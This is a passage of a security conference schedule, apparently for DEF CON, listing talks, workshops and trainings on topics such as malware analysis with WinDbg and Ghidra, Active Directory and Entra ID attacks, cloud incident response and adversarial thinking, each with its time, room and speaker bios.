Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 13:00-13:59 PDT


Title: A Tale of Weeds and Roses: Propagating the Right Data Protection Agreements with Vendors
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

When a company gives vendors access to its technical garden to process personal data, it’s the company’s responsibility to ensure vendors have adequate protections in place. Data protection/processing agreements (DPAs) are a control companies use to contractually obligate and specify what adequate protections vendors must have and to outline the consequences if vendors fail to protect the personal data. Propagating the right DPAs with vendors prevents invasive species from taking root in a company’s technical garden. Gardeners who attend this talk will walk away with a high-level understanding of: (a) how DPAs can be used to protect your company’s technical garden, (b) what information privacy/legal needs to know when negotiating a DPA, and (c) which DPA terms are roses to be cultivated or weeds to be removed.

Speakers:Irene Mo,Alyssa Coley

SpeakerBio:  Irene Mo

Irene is an attorney with experience counseling clients on United States and international privacy and data protection laws and regulations. She has helped companies of all sizes build and scale their privacy and data security compliance programs. Known as a problem solver, Irene’s clients trust her to collaborate across multiple business units within their companies to get privacy done. When there is a Hail Mary pass, her clients know she’s the one getting the ball across the goal line. In her free time, Irene is on the leadership board of several non-profits including Women in Security and Privacy (WISP), the Diversity in Privacy Section for the IAPP, the American Bar Association (ABA) Center of Innovation, and Lagniappe Law Lab.

SpeakerBio:  Alyssa Coley

Alyssa is on the board of Women In Security and Privacy (WISP) and is Privacy & Product Counsel at an Augmented Reality (AR) mobile gaming company. As in-house counsel, she focuses on integrating privacy by design into product development and ensuring global privacy compliance. Previously, she gained experience in privacy consulting and cybersecurity incident response. She has been involved with WISP for nearly a decade where she developed her interest in locksport and continues to further WISP's mission to advance women and underrepresented communities to lead the future of security and privacy.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Accelerating Malware Analysis with WinDbg Time Travel Debugging
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N257 - Map

Description:

Malware analysis and reverse engineering involve intricate execution, obfuscation, and anti-analysis techniques that hinder traditional debugging. This intensive, hands-on workshop introduces WinDbg's powerful Time Travel Debugging (TTD), allowing you to record a complete execution trace and replay it forwards and backwards. Designed for reverse engineers and malware analysts, this workshop provides practical skills to harness TTD, significantly cutting analysis time compared to traditional methods.

Throughout this 4-hour session, dive directly into practical application. Start with TTD essentials and capturing traces (GUI/CLI), then quickly progress to navigating timelines efficiently. Gain proficiency using the Debugger Data Model and LINQ queries to rapidly locate key events, API usage, and suspicious memory patterns within large traces. Crucially, learn to automate analysis by creating powerful JavaScript extensions for WinDbg, applying these skills in hands-on labs focused on tasks like extracting dynamically deobfuscated strings from malware. Leave equipped to confidently integrate WinDbg TTD into your workflow, accelerating your triage and deep-dive analysis capabilities.

Speakers:Joshua "jstrosch" Stroschein,Jae Young Kim

SpeakerBio:  Joshua "jstrosch" Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Jae Young Kim, Google

Jae Young Kim is a Senior Reverse Engineer on Mandiant's FLARE Team where he reverses malware and contributes to FLARE's automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Friday - 16:30-16:59 PDT


Title: Access Control Done Right the First Time
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Are you looking to install or upgrade a physical access control system? Having installed, repaired and upgraded dozens of large and small access control systems, I have found that many vendors install a "minimum viable product" that can leave your system unreliable and trivial to bypass.

This session will give you the tools and knowledge you need to work with your vendor to implement your system using best practices in the following areas:

SpeakerBio:  Tim Clevenger

As a low voltage hardware junkie, Tim has had the opportunity to design, expand, upgrade and repair numerous physical access control, alarm and video systems, including a stint at a security vendor where he was certified in Lenel/S2 access and video. Tim works today at SailPoint as a Cybersecurity Network Engineer.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 11:00-15:59 PDT


Title: accessDenied: Step Into the Scenario. Deal the Consequences.
When: Friday, Aug 8, 11:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall2-W606 - Map

Description:

Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.

🔍 Who Should Play?

🎯 What You’ll Learn

accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.

SpeakerBio:  Jack Voltaic, RIT

United States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.

Civil-military Local, community level Multi-sector Unclassified

With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Saturday - 11:00-15:59 PDT


Title: accessDenied: Step Into the Scenario. Deal the Consequences.
When: Saturday, Aug 9, 11:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall2-W606 - Map

Description:

Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.

🔍 Who Should Play?

🎯 What You’ll Learn

accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.

SpeakerBio:  Jack Voltaic, RIT

United States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.

Civil-military Local, community level Multi-sector Unclassified

With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Active Directory Attacks for Red and Blue Teams - Advanced Edition
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

More than 95% of Fortune 500 companies use Active Directory! Enterprises are managed using Active Directory (AD) and it often forms the backbone of the complete enterprise network. Therefore, to secure an enterprise from an adversary, it is inevitable to secure its AD environment. To secure AD, you must understand different techniques and attacks used by adversaries against it. Often burdened with maintaining backward compatibility and interoperability with a variety of products, AD environments lack ability to tackle latest threats.

This training is aimed towards attacking modern AD with focus on OPSEC and Stealth. The training is based on real world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course:

The course is a mixture of fun, demos, exercises, hands-on and lecture. You start from compromise of a user desktop and work your way up to multiple forest pwnage. The training focuses more on methodology and techniques than tools.

Attendees will get free two months access to an Active Directory environment comprising of multiple domains and forests, during and after the training and a Certified Red Team Expert Exam (CRTE) certification attempt.

Speakers:Nikhil,Manthan

SpeakerBio:  Nikhil, Founder at Altered Security

Nikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.

He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.

He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.

Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/

SpeakerBio:  Manthan, Security Researcher at Altered Security

Manthan is a security researcher with a strong passion for enterprise security, red teaming and Active Directory security. He specializes in testing enterprise security defences with a deep understanding of offensive strategies, including EDR evasion and Active Directory attacks. He continuously researches emerging threats, attack techniques, and mitigation strategies to stay ahead of evolving adversaries.

He works as a Security Researcher at Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Active Directory Attacks for Red and Blue Teams - Advanced Edition
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

More than 95% of Fortune 500 companies use Active Directory! Enterprises are managed using Active Directory (AD) and it often forms the backbone of the complete enterprise network. Therefore, to secure an enterprise from an adversary, it is inevitable to secure its AD environment. To secure AD, you must understand different techniques and attacks used by adversaries against it. Often burdened with maintaining backward compatibility and interoperability with a variety of products, AD environments lack ability to tackle latest threats.

This training is aimed towards attacking modern AD with focus on OPSEC and Stealth. The training is based on real world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course:

The course is a mixture of fun, demos, exercises, hands-on and lecture. You start from compromise of a user desktop and work your way up to multiple forest pwnage. The training focuses more on methodology and techniques than tools.

Attendees will get free two months access to an Active Directory environment comprising of multiple domains and forests, during and after the training and a Certified Red Team Expert Exam (CRTE) certification attempt.

Speakers:Nikhil,Manthan

SpeakerBio:  Nikhil, Founder at Altered Security

Nikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.

He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.

He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.

Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/

SpeakerBio:  Manthan, Security Researcher at Altered Security

Manthan is a security researcher with a strong passion for enterprise security, red teaming and Active Directory security. He specializes in testing enterprise security defences with a deep understanding of offensive strategies, including EDR evasion and Active Directory attacks. He continuously researches emerging threats, attack techniques, and mitigation strategies to stay ahead of evolving adversaries.

He works as a Security Researcher at Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 13:00-13:45 PDT


Title: Advanced Active Directory to Entra ID lateral movement techniques
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Is there a security boundary between Active Directory and Entra ID in a hybrid environment? The answer to this question, while still somewhat unclear, has changed over the past few years as there has been more hardening of how much “the cloud” trusts data from on-premises. The reason for this is that many threat actors, including APTs, have been making use of known lateral movement techniques to compromise the cloud. In this talk, we take a deep dive together into Entra ID and hybrid trust internals. We will introduce several new lateral movement techniques that allow us to bypass authentication, MFA and stealthily exfiltrate data using on-premises AD as a starting point, even in environments where the classical techniques don’t work. All these techniques are new, not really vulnerabilities, but part of the design. Several of them have been remediated with recent hardening efforts by Microsoft. Very few of them leave useful logs behind when abused. As you would expect, none of these “features” are documented. Join me for a wild ride into Entra ID internals, undocumented authentication flows and tenant compromise from on-premises AD.

References:

SpeakerBio:  Dirk-jan Mollema

Dirk-jan Mollema is a security researcher focusing on Active Directory and Microsoft Entra (Azure AD) security. In 2022 he started his own company, Outsider Security, where he performs penetration tests and reviews of enterprise networks and cloud environments. He blogs at dirkjanm.io, where he publishes his research, and shares updates on the many open source security tools he has written over the years. He presented previously at TROOPERS, DEF CON, Black Hat and BlueHat, is a current Microsoft MVP and has been awarded as one of Microsoft’s Most Valuable Researchers multiple times.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Advanced Cloud Incident Response in Azure and Microsoft 365
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This hands-on two-day training offers a comprehensive guide to incident response in the Microsoft cloud, covering various topics essential for handling threats and attacks. The course starts with an overview of the concepts of the Microsoft cloud that are relevant for incident response. Participants will learn how to scope an incident in the Microsoft cloud and how to leverage it to set up an incident response capability. On the first day you will be immersed in the world of Azure attacks, we cover the different phases of an attack focusing on the evidence an attack leaves and how you can identify attacks based on the available evidence. On the second day we will shift our focus to Microsoft 365. The training covers the different types of evidence available in a Microsoft 365 environment. Participants will gain an understanding of how to acquire data from a Microsoft 365 environment using multiple methods and tools, and how to parse, enrich, and analyze the Microsoft 365 Unified Audit Log (UAL). The best part of the training is that everything you learn you'll apply with hands-on labs in a CTF like environment. Additionally we have created two full attack scenarios in both Azure & M365 and you're tasked in the CTF to solve as many pieces of the puzzle as you can.

SpeakerBio:  Korstiaan Stam, Founder and CEO at Invictus Incident Response

Korstiaan Stam is the Founder and CEO of Invictus Incident Response & SANS Trainer - FOR509: Cloud Forensics and Incident Response. Korstiaan is a passionate incident responder, preferably in the cloud. He developed and contributed to many open-source tools related to cloud incident response. Korstiaan has gained a lot of knowledge and skills over the years which he is keen to share.

Way before the cloud became a hot topic, Korstiaan was already researching it from a forensics perspective. “Because I took this approach I have an advantage, because I simply spent more time in the cloud than others. More so, because I have my own IR consultancy company, I spent a lot of time in the cloud investigating malicious behavior, so I don’t just know one cloud platform, but I have knowledge about all of them.” That equips him to help students with the challenge of every cloud working slightly or completely different. “If you understand the main concepts, you can then see that there’s also a similarity among all the clouds. That is why I start with the big picture in my classes and then zoom in on the details. Korstiaan also uses real-life examples from his work to discuss challenges he’s faced with students to relate with their day-to-day work. “To me, teaching not only means sharing my knowledge on a topic, but also applying real-life implications of that knowledge. I always try to combine the theory with the everyday practice so students can see why it’s important to understand certain concepts and how the newly founded knowledge can be applied.”


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Advanced Cloud Incident Response in Azure and Microsoft 365
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This hands-on two-day training offers a comprehensive guide to incident response in the Microsoft cloud, covering various topics essential for handling threats and attacks. The course starts with an overview of the concepts of the Microsoft cloud that are relevant for incident response. Participants will learn how to scope an incident in the Microsoft cloud and how to leverage it to set up an incident response capability. On the first day you will be immersed in the world of Azure attacks, we cover the different phases of an attack focusing on the evidence an attack leaves and how you can identify attacks based on the available evidence. On the second day we will shift our focus to Microsoft 365. The training covers the different types of evidence available in a Microsoft 365 environment. Participants will gain an understanding of how to acquire data from a Microsoft 365 environment using multiple methods and tools, and how to parse, enrich, and analyze the Microsoft 365 Unified Audit Log (UAL). The best part of the training is that everything you learn you'll apply with hands-on labs in a CTF like environment. Additionally we have created two full attack scenarios in both Azure & M365 and you're tasked in the CTF to solve as many pieces of the puzzle as you can.

SpeakerBio:  Korstiaan Stam, Founder and CEO at Invictus Incident Response

Korstiaan Stam is the Founder and CEO of Invictus Incident Response & SANS Trainer - FOR509: Cloud Forensics and Incident Response. Korstiaan is a passionate incident responder, preferably in the cloud. He developed and contributed to many open-source tools related to cloud incident response. Korstiaan has gained a lot of knowledge and skills over the years which he is keen to share.

Way before the cloud became a hot topic, Korstiaan was already researching it from a forensics perspective. “Because I took this approach I have an advantage, because I simply spent more time in the cloud than others. More so, because I have my own IR consultancy company, I spent a lot of time in the cloud investigating malicious behavior, so I don’t just know one cloud platform, but I have knowledge about all of them.” That equips him to help students with the challenge of every cloud working slightly or completely different. “If you understand the main concepts, you can then see that there’s also a similarity among all the clouds. That is why I start with the big picture in my classes and then zoom in on the details. Korstiaan also uses real-life examples from his work to discuss challenges he’s faced with students to relate with their day-to-day work. “To me, teaching not only means sharing my knowledge on a topic, but also applying real-life implications of that knowledge. I always try to combine the theory with the everyday practice so students can see why it’s important to understand certain concepts and how the newly founded knowledge can be applied.”


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Advanced Ghidra Scripting & Automation
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N260 - Map

Description:

When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.

This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.

The workshop’s materials consist of multiple malware samples, the precautions for which will be explained in-detail during the workshop, ensuring the safety and integrity of the systems of the attendees. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21 is required. Its mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.

SpeakerBio:  Max "Libra" Kersten, Trellix

Max Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor's in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Friday - 15:45-16:30 PDT


Title: Adversarial mindset, thinking like an attacker is no longer optional
When: Friday, Aug 8, 15:45 - 16:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

As threat actors evolve in speed, sophistication, and stealth, traditional defense strategies alone are no longer sufficient. This panel delves into the strategic importance of adopting an adversarial mindset, where defenders must think like attackers to stay ahead. Industry experts will discuss how adversary emulation and offensive cyber security techniques are being used not just to test systems, but to actively inform and strengthen defensive strategies. From red teaming to threat-informed defense, the panel will dive into how organizations are embedding adversarial thinking into their security programs to uncover blind spots, reduce response times, and build resilience against real-world threats. Whether you are defending an enterprise or building the next wave of security tools, embracing the adversarial mindset is no longer optional, it is essential. The panel will also cover a range of adversarial scenarios, including not only nation-state sponsored threat actors and targeted cyberattacks, but also the evolving warfare landscape witnessed recently, the use of technology by adversaries during conflicts, and effective countermeasures to address these challenges.

Speakers:Abhijith "Abx" B R,Keenan Skelly

SpeakerBio:  Abhijith "Abx" B R

Abhijith B R, also known by the pseudonym Abx, has more than a decade of experience in the offensive cyber security industry. He is a professional hacker, offensive cyber security specialist, red team consultant, security researcher, trainer and public speaker.

Currently, he is building Breachsimrange.io and is involved with multiple organizations as a consulting specialist to help them build offensive security operations programs, improve their current security posture, assess cyber defense systems, and bridge the gap between business leadership and security professionals.

Abhijith was responsible for building and managing offensive security operations and adversary simulation for a prominent FinTech company called Envestnet, Inc. In the past, he held the position of Deputy Manager - Cyber Security at Nissan Motor Corporation, and prior to that, he worked as a Senior Security Analyst at EY.

As the founder of Adversary Village (https://adversaryvillage.org/), Abhijith spearheads a community initiative focused on adversary simulation, adversary-tactics, purple teaming, threat actor/ransomware research-emulation, and offensive cyber security. Adversary Village is part of DEF CON Villages and organizes hacking villages at prominent events such as the DEF CON Hacking Conference, RSA Conference etc.

Abx also acts as the Lead of an official DEF CON Group named DC0471. He is actively involved in leading the Tactical Adversary project (https://tacticaladversary.io/), a personal initiative that centers around offensive cyber security, adversary attack simulation and red teaming tradecraft.

Abhijith has spoken at various hacking and cyber security conferences such as, DEF CON hacker convention – Las Vegas, RSA Conference – San Francisco, The Diana Initiative – Las Vegas, DEF CON 28 safemode - DCG Village, Opensource India, Security BSides Las Vegas, BSides San Francisco, Hack Space Con – Kennedy space center Florida, Nullcon – Goa, c0c0n – Kerala, BSides Delhi, etc.

SpeakerBio:  Keenan Skelly

Keenan Skelly is a nationally recognized cybersecurity and emerging technology strategist with 25 years of experience across government, private sector, and entrepreneurial leadership. She, most recently served as a Senior Policy Advisor at the White House Office of the National Cyber Director (ONCD), where she guided national initiatives on cybersecurity workforce, AI policy, and strategic technology development. A former Plank Owner of NPPD at DHS of the Comprehensive Review Program (the predecessor to CISA), Keenan also led multi-agency counter-IED and critical infrastructure protection programs across the federal government. She has founded and led multiple tech startups focused on threat intelligence, cybersecurity, and gamified training; and is the Founder of the XRVillage. Named one of the Top 25 Women in Cybersecurity, she is a frequent speaker on national security, AI, and immersive technology. Her unique background blends operational expertise, policy acumen, and visionary innovation.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Adversarial Thinking: The Art of Dangerous Ideas
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Hackers have a unique perspective on the world and in particular on the technological artifacts within it. When most people look at a high tech system, they see what they were meant to see by the people who created it. Hackers see technology as it truly is, not as it was meant to be, and this way of looking at things enables hackers to discover possibilities that were never intended in the first place.

For centuries, military and intelligence strategists have sought to view the world from a similar perspective - a perspective that can see the hidden possibilities and weaknesses in things and take advantage of them to create unexpected results.

This unique course draws lessons from both the hacker community and from military thinking in order to deepen your ability to understand adversaries and see things the way that adversaries see them.

Honing this skill is particularly valuable for people who are building technological systems that might be subject to misuse and need to be able to anticipate that misuse. Whether you are an aspiring red teamer, a hardware engineer, software developer or product owner striving to understand how your product will be abused, or you work in fraud detection, risk analysis, election security, or any other domain where you face an adversary, you’ll find this course a valuable addition to your skill set.

We will…

After completing the course you’ll leave with:

This interesting and fast-moving class will include hands-on exercises to apply and reinforce the skills learned. You’ll leave this course with a fresh perspective and a toolkit of techniques to better accomplish your mission. Come join us.

Speakers:Tom Cross,Greg Conti

SpeakerBio:  Tom Cross

Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.

SpeakerBio:  Greg Conti, Co-Founder and Principal at Kopidion

Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.

Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.

Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Adversarial Thinking: The Art of Dangerous Ideas
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Hackers have a unique perspective on the world and in particular on the technological artifacts within it. When most people look at a high tech system, they see what they were meant to see by the people who created it. Hackers see technology as it truly is, not as it was meant to be, and this way of looking at things enables hackers to discover possibilities that were never intended in the first place.

For centuries, military and intelligence strategists have sought to view the world from a similar perspective - a perspective that can see the hidden possibilities and weaknesses in things and take advantage of them to create unexpected results.

This unique course draws lessons from both the hacker community and from military thinking in order to deepen your ability to understand adversaries and see things the way that adversaries see them.

Honing this skill is particularly valuable for people who are building technological systems that might be subject to misuse and need to be able to anticipate that misuse. Whether you are an aspiring red teamer, a hardware engineer, software developer or product owner striving to understand how your product will be abused, or you work in fraud detection, risk analysis, election security, or any other domain where you face an adversary, you’ll find this course a valuable addition to your skill set.

We will…

After completing the course you’ll leave with:

This interesting and fast-moving class will include hands-on exercises to apply and reinforce the skills learned. You’ll leave this course with a fresh perspective and a toolkit of techniques to better accomplish your mission. Come join us.

Speakers:Tom Cross,Greg Conti

SpeakerBio:  Tom Cross

Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.

SpeakerBio:  Greg Conti, Co-Founder and Principal at Kopidion

Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.

Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.

Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Friday - 15:00-15:45 PDT


Title: Adversaries at War: Tactics, technologies, and lessons from modern battlefields
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Recent conflicts have shown us that wars today aren’t just fought with traditional weapons, they are fought with code, misinformation, and influence. This panel dives into how adversaries are using a mix of traditional and unconventional tactics, from cyber attacks to psychological operations, to gain the upper hand on modern battlefields. We will look at real examples from recent wars, explore the technologies driving these shifts, and discuss what defense, security, and policy leaders need to take away from it all.

Speakers:Gregory Carpenter,Barb Hirz,Bret Fowler,John Andre Bjørkhaug,John Johnson,Michael Tassey

SpeakerBio:  Gregory Carpenter, CSO at KnowledgeBridge InternationalDrPH

